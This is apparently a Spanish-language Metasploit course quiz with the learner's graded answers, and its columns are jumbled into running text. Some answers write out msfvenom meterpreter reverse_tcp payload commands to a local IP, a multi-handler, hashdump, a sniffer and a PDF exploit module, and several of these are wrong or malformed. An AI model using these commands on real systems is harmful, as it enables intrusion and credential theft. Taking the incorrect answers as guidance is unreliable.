Estas son las preguntas del examen que has realizado y sus resultados
Pregunta Tu respuesta Resultado
Meterpreter es una herramienta incluida A bajo nivel y asi conseguir una mayor evasion ante en Metasploit Correcto sistemas de protección Framework que se ejecuta... Una de las herramientas incluidas en Metasploit Para una vez comprometido un sistema dejar una Framework es Netcat, puerta trasera (Backdoor) y asi asegurarnos la Correcto ¿para que se usa esta conexión con esta herramienta en Metasploit Framework mayormente? ¿Una vez arrancado el entorno de consola de Metasploit Framework, con que ?, show, help Incorrecto comando veremos los comandos propios de esta herramienta? ¿Uno de los mejores interfaces gráficos para Metasploit Framework se llama hosts Correcto Armitage, en el menú de este, ¿en qué pestaña añadiríamos los objetivos? ¿Qué comando usaríamos si quisiésemos que Metasploit Framework nos search encoders Incorrecto mostrase únicamente los encoders incluidos en Metasploit Framework? ¿Qué selección de las use auxiliary/server/capture/http_basic Correcto siguientes nos valdría para ejecutar un ataque por medio de "phishing" desde la Pregunta Tu respuesta Resultado herramienta de Metasploit Framework? La herramienta integrada en Metasploit Por medio de diferentes técnicas incluidos ataques Framework por diccionarios y enfocada unicamente a ataques de Correcto denominada Jhon the fuerza bruta OFFLINE ripper esta enfocada a ataques de contraseñas...: Nessus es un escáner de vulnerabilidades enfocado a sistemas, es decir, servidores, PC, etc, ¿cómo nessus_help Correcto obtendríamos la ayuda de este desde la consola de Metasploit Framework? ¿Con qué opción podríamos usar al escáner de puertos y servicios Nmap para --script-vuln Correcto detectar las vulnerabilidades mas conocidas? El comando "RHOST" hace Remote Host Correcto referencia a: Cual seria el exploit correcto para generar un ataque del lado del exploit/windows/fileformat/adobe_utilprintf Correcto cliente mediante un archivo con formato PDF?: Basándonos en la pregunta anterior (19) con que opción añadiríamos algún -e Correcto encoder a la creación de un ejecutable para Linux: ¿Qué exploit Multi Handler Correcto usaremos para la configuración y recepción de las maquinas Pregunta Tu respuesta Resultado comprometidas? ¿Qué es un Correcto Una herramienta enfocada a auditores de seguridad y Metasploit Hackers éticos. Framework? msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp De las siguientes LHOST=192.168.1.101 -f exe -o Meterpreter.exe, configuraciones de la msfvenom -a x86 --platform windows -p herramienta windows/reverse_tcp LRHOST=192.168.1.101 -f exe Incorrecto "Msfvenom" cual/es -o Meterpreter.exe, msfvenom -a x86 --platform son correctas: windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 -b "\x00" -f exe -o Meterpreter.exe ¿Cómo detendríamos la base de datos de Postgresql que anteriormente systemctl stop postgresql Correcto ejecutamos para hacer uso de Metasploit Framework? Una de las siguientes técnicas una vez invadido un sistema, es la escalada de ninguna Incorrecto privilegios, que extensión deberíamos cargar para ejecutar este ataque?: Que comando ejecutaríamos en Metasploit Framework para ver la versión del vulns Incorrecto software y la cantidad de exploits, encoders, payloads, etc, que contiene esta: Para ejecutar un escaneo de puertos con Nmap dentro de Metasploit Framework, ¿cómo db_nmap Correcto usaríamos esta herramienta para trabajar insitu con Metasploit Framework? ¿Con que comando de hashdump Correcto Pregunta Tu respuesta Resultado Meterpreter obtendríamos contraseñas cifradas del sistema?
Resultados
Estas son las preguntas del examen que has realizado y sus resultados
Pregunta Tu respuesta Resultado
¿Cómo buscaríamos un payload en concreto, por ejemplo el search meterpreter Correcto conocido Meterpreter? ¿Con que comando de Meterpreter obtendríamos hashdump Correcto contraseñas cifradas del sistema? Un codificador de código para evadir Que es un encoder: Correcto sistemas de protección como antivirus, etc. ¿Uno de los mejores interfaces gráficos para Metasploit Framework se llama Armitage, hosts Correcto en el menú de este, ¿en qué pestaña añadiríamos los objetivos? ¿Qué comando usaríamos si info quisiésemos obtener información Correcto exploit/windows/smb/ms03_049_netapi de un exploit en concreto? En Kali Linux, cual seria el comando corrector para ls /usr/share/metasploit- visualizar los exploits de Correcto framework/modules/exploits/ Metasploit Framework en nuestro equipo: Una vez ejecutado el "sniffer" en la maquina victima, ¿qué comando deberemos ejecutar sniffer_dump (tarjeta de red) Correcto para que esta nos descargue y /ruta/capura.pcap guarde el resultado del trafico capturado? Cual seria el exploit correcto para generar un ataque del lado exploit/windows/fileformat/adobe_utilprin Correcto del cliente mediante un archivo tf con formato PDF?: Que comando ejecutaríamos en Metasploit Framework para ver la versión del software y la info Incorrecto cantidad de exploits, encoders, payloads, etc, que contiene esta: Pregunta Tu respuesta Resultado Una vez configurado un exploit con su correspondiente Payload, run, launch Incorrecto que comando usaremos para lanzarlo?: A la hora de generar un script con formato *.rc (resources script) para la ejecución del exploit multihandler y asi recibir msfconsole -R meterpreter.rc Incorrecto las conexiones de las maquinas victimas, ¿cómo se ejecutaría éste con Metasploit Framework?: ¿Cómo detendríamos la base de datos de Postgresql que anteriormente ejecutamos para systemctl stop postgresql Correcto hacer uso de Metasploit Framework? Una de las herramientas incluidas en Metasploit Para una vez comprometido un sistema Framework es Netcat, ¿para que dejar una puerta trasera (Backdoor) y asi Correcto se usa esta herramienta en asegurarnos la conexión con esta Metasploit Framework mayormente? ¿Para que sirve Metasploit Para descubrir sistemas, auditarlos y Correcto Framework? posteriormente explotarlos. Como generaríamos con la msfvenom -p herramienta Msfvenom una linux/x86/meterpreter/reverse_tcp Incorrecto backdoor para un sistema basado RHOST=RPORT LPORT=IP -f exe > en Debian: shell.exe ¿Una vez arrancado el entorno de consola de Metasploit Framework, con que comando show, help Incorrecto veremos los comandos propios de esta herramienta? La herramienta integrada en Por medio de diferentes técnicas incluidos Metasploit Framework ataques por diccionarios y enfocada denominada Jhon the ripper esta Correcto unicamente a ataques de fuerza bruta enfocada a ataques de OFFLINE contraseñas...: Una vez seleccionado un escáner con el comando "use (portscan)"Cual seria una configuración básica en el set RHOSTS (IP), set PORTS 1-65535, set Correcto siguiente escaner de Metasploit THREADS 5 Framework "auxiliary/scanner/portscan/tcp"? : ¿Qué exploit usaremos para la shell Incorrecto configuración y recepción de las Pregunta Tu respuesta Resultado maquinas comprometidas? msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp De las siguientes LHOST=192.168.1.101 -f exe -o configuraciones de la Meterpreter.deb, msfvenom -a x86 Incorrecto herramienta "Msfvenom" cual/es --platform windows -p son correctas: windows/reverse_tcp LRHOST=192.168.1.101 -f exe -o Meterpreter.exe